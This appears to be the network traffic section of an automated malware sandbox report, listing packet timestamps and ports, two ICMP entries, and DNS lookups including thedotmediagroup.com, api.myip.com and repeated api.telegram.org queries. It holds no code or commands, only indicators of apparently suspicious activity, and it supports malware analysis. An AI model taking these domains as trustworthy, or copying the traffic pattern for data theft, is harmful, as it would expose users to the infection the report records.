Nov 21, 2024 22:15:14.692380905 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692390919 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692400932 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692563057 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692665100 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692866087 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.692945957 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.693044901 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.693125010 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.761943102 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.765662909 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.890256882 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.891146898 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.902295113 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.906598091 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.906858921 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.086303949 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.089695930 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.091341972 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.093523979 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.093734026 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.093997955 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.094300985 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.094724894 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.125869036 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.125976086 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.421168089 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.450176001 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.450562954 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:15.452450037 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.452591896 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:15.452855110 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.798624992 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.798825026 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.798986912 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.798986912 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.799042940 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.799098015 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.803436995 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:16.803534985 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.123485088 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.124543905 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.124866009 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.124965906 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.125195980 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.125287056 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.125354052 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.125364065 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.125806093 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.125991106 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.128000021 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.129458904 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.129873991 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.130006075 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.364448071 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.364559889 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:17.689820051 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.690164089 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.691123009 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:17.691426039 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.407452106 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.407588005 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.408128977 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.408252001 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.408608913 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.408777952 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.733954906 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.735255957 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.735975027 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.736232996 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.736505985 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.736521959 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.736532927 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.736541986 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:19.736736059 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:19.737050056 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.604600906 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.604731083 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.627604961 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.627737045 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.633533001 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.633666992 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.929312944 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.932069063 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.933789968 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.934236050 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.953773022 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.954849958 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.955502033 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.955707073 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:25.957446098 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.961337090 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.966048956 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:25.966276884 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:26.257221937 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:26.299237967 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:30.019907951 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:30.020086050 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:30.344804049 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:30.347817898 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:30.349724054 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:30.350199938 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:47.230005026 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:47.230170012 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:47.554718971 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:47.556647062 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:47.557918072 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:47.560435057 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:52.132061005 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:52.132061005 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:52.456813097 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:52.459101915 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:52.459222078 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:52.459364891 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:01.344800949 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:01.346088886 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:01.346088886 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:01.346347094 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.368844986 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.368908882 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.369199991 CET	58287	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:02.369461060 CET	64270	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:02.369610071 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.369643927 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.369740009 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.531507969 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.531997919 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.571360111 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.702238083 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702287912 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702347994 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702394962 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702423096 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702503920 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.702781916 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.702914953 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.703226089 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.712074995 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:02.864845991 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:02.899669886 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:03.035748005 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:03.035784960 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:03.044579029 CET	443	51672	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:03.071304083 CET	51672	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:04.639079094 CET	53	50719	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:35.462435007 CET	53	56655	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:49.823499918 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:49.823689938 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:49.823966980 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:49.823966980 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.837642908 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.837718010 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.838041067 CET	63096	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:50.838315010 CET	50805	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:50.838402033 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.838490009 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.954462051 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:50.955077887 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:50.993451118 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.161113977 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161132097 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161159039 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161168098 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161173105 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161258936 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.161550045 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.161621094 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.161705017 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.165376902 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.278234005 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.306353092 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:16:51.490156889 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.493736029 CET	443	60928	162.159.61.3	192.168.2.5
Nov 21, 2024 22:16:51.524606943 CET	60928	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:52.567529917 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:52.567750931 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:52.568074942 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:52.568192959 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.586847067 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.586847067 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.587142944 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.587213039 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.709692001 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:53.714765072 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.746764898 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.922424078 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:53.922447920 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:53.922461033 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:53.922512054 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:53.923073053 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.923073053 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:53.923073053 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:54.047513962 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:54.087521076 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:17:54.256057978 CET	443	54827	162.159.61.3	192.168.2.5
Nov 21, 2024 22:17:54.289591074 CET	54827	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:18:46.040618896 CET	58091	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:18:46.177486897 CET	53	58091	1.1.1.1	192.168.2.5
Nov 21, 2024 22:19:49.854204893 CET	59921	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:19:49.854382992 CET	55451	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:19:49.991110086 CET	53	55451	1.1.1.1	192.168.2.5
Nov 21, 2024 22:19:49.991256952 CET	53	59921	1.1.1.1	192.168.2.5
Nov 21, 2024 22:19:49.992779016 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:49.992964029 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:49.993391991 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:49.993594885 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:50.868587971 CET	51999	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:19:50.868593931 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:50.868593931 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:50.868927956 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:50.868928909 CET	59016	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:19:50.868990898 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.124372005 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.128062963 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.167346954 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.193109035 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.193233013 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.193275928 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.193317890 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.193557024 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.193578005 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.193578005 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.456998110 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.495677948 CET	59542	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:19:51.516977072 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.517011881 CET	443	59542	162.159.61.3	192.168.2.5
Nov 21, 2024 22:19:51.555706024 CET	59542	443	192.168.2.5	162.159.61.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 21, 2024 22:13:06.058908939 CET	192.168.2.5	1.1.1.1	c29b	(Port unreachable)	Destination Unreachable
Nov 21, 2024 22:14:53.992043972 CET	192.168.2.5	1.1.1.1	c29c	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 22:12:09.553951025 CET	192.168.2.5	1.1.1.1	0x1228	Standard query (0)	thedotmediagroup.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:41.062479019 CET	192.168.2.5	1.1.1.1	0x8712	Standard query (0)	api.myip.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:55.747128963 CET	192.168.2.5	1.1.1.1	0x58db	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:55.747296095 CET	192.168.2.5	1.1.1.1	0x2009	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 21, 2024 22:13:04.389655113 CET	192.168.2.5	1.1.1.1	0x2bb2	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.389847040 CET	192.168.2.5	1.1.1.1	0x37c2	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:13:04.532634020 CET	192.168.2.5	1.1.1.1	0x3545	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.532836914 CET	192.168.2.5	1.1.1.1	0xece5	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:13:04.533422947 CET	192.168.2.5	1.1.1.1	0x3dbb	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.533668041 CET	192.168.2.5	1.1.1.1	0xe322	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:13:04.555814028 CET	192.168.2.5	1.1.1.1	0x4258	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.556057930 CET	192.168.2.5	1.1.1.1	0x5eb3	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:13:07.636600971 CET	192.168.2.5	1.1.1.1	0x4685	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:07.636924982 CET	192.168.2.5	1.1.1.1	0x9901	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 21, 2024 22:14:47.544872999 CET	192.168.2.5	1.1.1.1	0x3be	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:47.545123100 CET	192.168.2.5	1.1.1.1	0x6c38	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:49.812057972 CET	192.168.2.5	1.1.1.1	0x6a47	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:49.812057972 CET	192.168.2.5	1.1.1.1	0x2ae1	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 21, 2024 22:14:50.152337074 CET	192.168.2.5	1.1.1.1	0xc1fb	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.152535915 CET	192.168.2.5	1.1.1.1	0xfb2f	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:50.159936905 CET	192.168.2.5	1.1.1.1	0xd067	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.160165071 CET	192.168.2.5	1.1.1.1	0x8043	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:50.301636934 CET	192.168.2.5	1.1.1.1	0x8ddc	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.301794052 CET	192.168.2.5	1.1.1.1	0xeef	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:50.379450083 CET	192.168.2.5	1.1.1.1	0xedea	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.379761934 CET	192.168.2.5	1.1.1.1	0x52c9	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:50.475274086 CET	192.168.2.5	1.1.1.1	0x81ef	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:50.475532055 CET	192.168.2.5	1.1.1.1	0x9905	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:51.384736061 CET	192.168.2.5	1.1.1.1	0xec65	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.529969931 CET	192.168.2.5	1.1.1.1	0x56df	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.530227900 CET	192.168.2.5	1.1.1.1	0xa1de	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:14:52.530817032 CET	192.168.2.5	1.1.1.1	0xece7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:14:52.530930042 CET	192.168.2.5	1.1.1.1	0x32cb	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:15:08.947881937 CET	192.168.2.5	1.1.1.1	0x2f5e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:16:02.369199991 CET	192.168.2.5	1.1.1.1	0x16b0	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:16:02.369461060 CET	192.168.2.5	1.1.1.1	0x90d4	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 21, 2024 22:16:50.838041067 CET	192.168.2.5	1.1.1.1	0xb20	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:16:50.838315010 CET	192.168.2.5	1.1.1.1	0xc593	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 21, 2024 22:18:46.040618896 CET	192.168.2.5	1.1.1.1	0x6865	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:49.854204893 CET	192.168.2.5	1.1.1.1	0xeef6	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:49.854382992 CET	192.168.2.5	1.1.1.1	0xe671	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 21, 2024 22:19:50.868587971 CET	192.168.2.5	1.1.1.1	0xc973	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:19:50.868928909 CET	192.168.2.5	1.1.1.1	0x63cd	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 22:11:15.754086971 CET	1.1.1.1	192.168.2.5	0xae62	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:11:15.754086971 CET	1.1.1.1	192.168.2.5	0xae62	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:10.092015028 CET	1.1.1.1	192.168.2.5	0x1228	No error (0)	thedotmediagroup.com		188.165.52.14	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:41.202162027 CET	1.1.1.1	192.168.2.5	0x8712	No error (0)	api.myip.com		172.67.75.163	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:41.202162027 CET	1.1.1.1	192.168.2.5	0x8712	No error (0)	api.myip.com		104.26.8.59	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:41.202162027 CET	1.1.1.1	192.168.2.5	0x8712	No error (0)	api.myip.com		104.26.9.59	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:55.884210110 CET	1.1.1.1	192.168.2.5	0x58db	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:12:55.884414911 CET	1.1.1.1	192.168.2.5	0x2009	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 21, 2024 22:13:04.531302929 CET	1.1.1.1	192.168.2.5	0x2bb2	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:13:04.531960964 CET	1.1.1.1	192.168.2.5	0x37c2	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 22:13:04.677383900 CET	1.1.1.1	192.168.2.5	0xece5	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 21, 2024 22:13:04.678039074 CET	1.1.1.1	192.168.2.5	0x3545	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.678039074 CET	1.1.1.1	192.168.2.5	0x3545	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.678234100 CET	1.1.1.1	192.168.2.5	0x3dbb	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 22:13:04.678234100 CET	1.1.1.1	192.168.2.5	0x3dbb	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
